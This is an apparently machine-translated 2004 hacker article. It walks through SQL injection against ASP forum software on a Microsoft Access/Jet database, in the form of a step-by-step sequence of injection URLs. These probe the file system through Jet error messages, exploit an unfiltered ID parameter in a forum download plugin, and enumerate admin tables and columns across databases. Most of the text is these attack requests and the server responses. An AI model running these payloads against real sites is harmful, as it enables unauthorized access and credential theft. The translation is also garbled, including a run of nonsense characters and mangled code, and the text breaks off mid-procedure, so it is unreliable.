Author: sniper article in Nature: Original release date: 2004-04-02 From: www.4ngel.net E-Mail: sniper@77169.com ######## This article has been published in the "Hacker X Files" ###################### 看 这个 这个 西 西 我 我 西 西 西 西 西 我 西 我 西 我 西 西 我 我 我 西 西 西 西 西 西 西 我 我 西 西 西 西 西 我 我 我 西 西 我 西 西 西 西 我 西 西 西 我 我 西 西 我The information on the library query is casually found and can find a lot, unlike the previous information, I have to pay attention to a big pile of e-card. Today I am talking about a new gameplay of a cross-library inquiry found before, you can listen carefully. Introduce the example first, in about a month ago, the phantom brigade and gray trajectory have discussed this question is submitted:
http://www.target.com/show.asp?id=1 OR 0 <> (Select Count (*) from admin.c) The following error message: Microsoft Jet Database Engine error '80004005' can't find File 'c: /winnt/system32/admin.mdb'. Seeing it, if you read the learning report written by xhacker, it is already excited, because the report reverses a vulnerability of Access can Dir C: / / S! Let us continue to play, submit:
http://www.target.com/show.asp?id=1 OR 0 <> (Select Count (*) from c: /boot.ini) Back: Microsoft Jet Database Engine Error '80004005' Cannot Find file ' C: /Boot.mdb '. See some of the part behind from From, we can add a path. Since I want DIR, I will have to visit cmd.exe, come on:
http://www.target.com/show.asp?id=1 or 0 <> (select count (*) from c: /winnt/system32/cmd.exe.c) Take a look at the error message: Microsoft Jet Database Engine error '80004005' Unrecognizable database format 'c: /winnt/system32/cmd.exe'. It seems that our hope is empty. (After multiple practice, you can get the format of the file name behind the future): File name. Suffix name. Any letter so you can access the file name. file). At this time, this vulnerability seems to be at most, you can only determine if a directory or a file exists. At that time, I thought that this is the loopholes of the chicken ribs like this, and it is unfortunately. Later, I helped a friend to detect the safety of the forum, I saw the Ya Artsi Forum. First, I tried the default database name. Submitted: http://www.target.com/yabbs/data/1yabbs.asp, no prompts can't find the file, see that there is no change database name. But because the extension is .asp, we still can't download his database. No way, I have to go to the hard drive for a long time to take out the original Ya Art Forum that I originally downloaded. As a result, I really found an exciting place to discover such a code in the Download plug-in download of the forum.
If Request ("ID") = "" Ten Response.write "You did not select the relevant software, please return" Response.end end if set = server.createObject ("adoDb.recordset") SQL = "Select Dclass.class, DNclass.Nclass, download.showname, download.classid, download.Nclassid, download.lasthits, download.downshow from download, Dclass, DNclass where download.classid = Dclass.classid and download.Nclassid = DNclass.Nclassid and download.ID = "& Request (" ID ") sees no, & request (" id ") This variable does not do any filtering, as a query statement, we can use SQL injection! It's easy to say, but I have encountered difficulties when I do it, submit it as follows URL: http://www.target.com/yabbs/down_list.asp? Id = 1% 20OR% 200 <> (select% 20count (*)% 20FROM% 20Admin) Successfully returned to the page, OK, there is an admin table. Let's determine the column name of the saved user name:
http://www.target.com/yabbs/down_list.asp?id=1 OR 0 "(select count(-) from admin where username) is also successful, save the user name UserName Let's take a password column:
http://www.target.com/yabbs/down_list.asp?id=1 OR 0 "(SELECT count(- ) from admin where password) error, no relationship is ready, try again. Finally, almost the column name I can think of. Since there is no right, this round to me is depressed, ask that friend has handled the database, the answer is not. Then open his default database, there are two databases in the Data directory, one is 1yabbs.asp (forum), one is Download.asp (download system), open, there is no password column at all! It is seen that I haven't played again. Later, I suddenly thought of using methods when I was idle with MM (don't say that I chat with MM. :). When SQL is injected, we sometimes use this statement "admin.id" where admin is a table name, ID is a column name. Then we can make the chicken rib vulnerabilities discussed in the previous period, since it is thought, then you have to practice it, use the way to say, first come to the web directory:
http://www.target.com/yabbs/down_list.asp?id=1 OR 0 "(SELECT count(- ) From c:/web/wcc) Return to the following information: Microsoft Jet Database Engine Error '80004005' 'c: /web/w.c' is not an effective path. Determine if the path name spell is correct, and whether it is connected to the server stored. /yabbs/down_list.asp, line 37 directory guess, then: http://www.target.com/yabbs/down_list.asp? id = 1% 20OR% 200 <> (select% 20count (*)% 20FROM % 20D: / Web / WCC) This tip has changed: Microsoft VBScript compiler error Error '8000A03F6' lack of 'end' /iishelp/common/500-100.asp, line 242 Microsoft Jet Database Engine error '80004005' Can't ask file 'd: /web/w.c'. /yabbs/down_list.asp, line 37 This time I can't find a file, huh, I know the web directory is easy to guess. Submit again:
http://www.target.com/yabbs/down_list.asp?id=1 OR 0 "(select count(- ) From d:/web/yabbs/dataabbs.asp.c) this time OK, I directly guessed the specific path, but the prompt is just like my thoughts, it is really # $ # $ @ (At this time, the excited faint over 10 seconds ...) The information returned as: Microsoft VBScript compiler error Error '8000A03F6' missing 'end' /iishelp/common/500-100.asp, line 242 Microsoft Jet Database Engine Error '80040E37' Microsoft Jet Database Engine Can't find the input table or query 'c'. Determine if it exists, and whether the spelling of its name is correct. Ok, now everything will become simplified, submit the query statement to determine the table and column name.
http://www.target.com/yabbs/down_list.asp?id=1 OR 0 "(SELECT Count(- ) From d:/web/yabbs/dataabbs.asp.admin where% 20Username) Successfully displayed, in which ADMIN tables and username columns exist in the 1yabbs.asp. Let's query the ID value, submit the following URL:
